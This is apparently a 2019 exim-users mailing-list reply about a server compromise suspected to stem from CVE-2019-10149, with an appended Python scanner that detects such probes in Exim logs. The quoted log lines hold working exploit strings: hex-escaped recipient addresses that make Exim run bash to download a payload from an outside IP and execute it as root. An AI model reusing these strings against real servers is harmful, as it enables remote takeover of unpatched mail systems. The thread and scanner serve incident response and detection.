Re: [exim] just been hacked, could be CVE-2019-10149?

Author: Cyborg
Date:  
To: exim-users
Subject: Re: [exim] just been hacked, could be CVE-2019-10149?
On 11.06.19 at 08:27, Odhiambo Washington via Exim-users wrote:
> On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <
> exim-users@???> wrote:
>
>> hi all,
>>
>> My mail system has just been hacked; it's running Debian unstable exim
>> 4.91-9
>>
>> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
>>
>> The reasons I suspect exim involvement:
>>
>> • starting today, every 5 mins getting frozen messages:
>>
>> The following address(es) have yet to be delivered:
>>
>>
>> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>>
>>


I checked the server I did the restricted chars change for and this is
the result:

2019-06-10 04:31:04 H=(xxxxxxxxxxxxxx.de) [89.248.171.57] F=<> rejected RCPT <bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ekqvuhtpi\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ekqvuhtpi\x20\x2dn\x22\x20\x26}}@???>: Restricted characters in address

\o/ Success! :D


This attack was presented to you by... the Seychelles Islands.


best regards,
Marius
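The rejectlog line in the message above is the kind of evidence worth spotting automatically. The following is an added example, not code from the thread or from Exim: a small Python scanner over constructed Exim main-log lines (placeholder hostnames, TEST-NET addresses and a harmless command in place of the real payload) that flags any RCPT whose local part carries a `${run{...}}` expansion, records whether the ACL rejected it, and decodes the `\xNN` escapes so the attempted command can be read during triage.

```python
import re

# Constructed sample Exim main-log lines (not from the original thread).
# The first RCPT carries an Exim string expansion in its local part, hex-escaped
# the same way the CVE-2019-10149 probes in the thread were.
SAMPLE_LOG = r"""
2019-06-10 04:31:04 H=(mail.example.de) [192.0.2.10] F=<> rejected RCPT <bin+${run{\x2fbin\x2fsh\x20\x2dc\x20\x22id\x22}}@example.org>: Restricted characters in address
2019-06-10 04:32:11 H=(mx.example.net) [198.51.100.7] F=<alice@example.net> rejected RCPT <nobody@example.org>: relay not permitted
2019-06-10 04:33:40 1hZy0A-0001Xy-2k <= alice@example.net H=mx.example.net [198.51.100.7] P=esmtps S=1234
""".strip().splitlines()

RCPT_RE = re.compile(r"RCPT <([^>]*)>")        # the address the peer asked for
EXPANSION_RE = re.compile(r"\$\{run\{")        # Exim's ${run{...}} expansion item
HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")     # \xNN escapes used to hide the command
IP_RE = re.compile(r"\[([0-9a-fA-F.:]+)\]")    # bracketed peer address


def decode_escapes(s):
    """Turn \\xNN escapes back into characters so the payload is readable."""
    return HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def find_run_expansions(lines):
    """Return (peer_ip, rejected, decoded_local_part) for every RCPT whose
    local part tries to invoke the ${run{...}} expansion item."""
    hits = []
    for line in lines:
        m = RCPT_RE.search(line)
        if not m:
            continue                      # not an RCPT log line
        addr = m.group(1)
        if not EXPANSION_RE.search(addr):
            continue                      # ordinary address, nothing to flag
        ip_m = IP_RE.search(line)
        ip = ip_m.group(1) if ip_m else "?"
        rejected = "rejected RCPT" in line
        local_part = addr.rsplit("@", 1)[0]
        hits.append((ip, rejected, decode_escapes(local_part)))
    return hits


if __name__ == "__main__":
    for ip, rejected, cmd in find_run_expansions(SAMPLE_LOG):
        print(f"{ip} rejected={rejected} local_part={cmd}")
```

A hit with `rejected=False` means the address got past the ACL and the message needs to be pulled from the queue and the host examined.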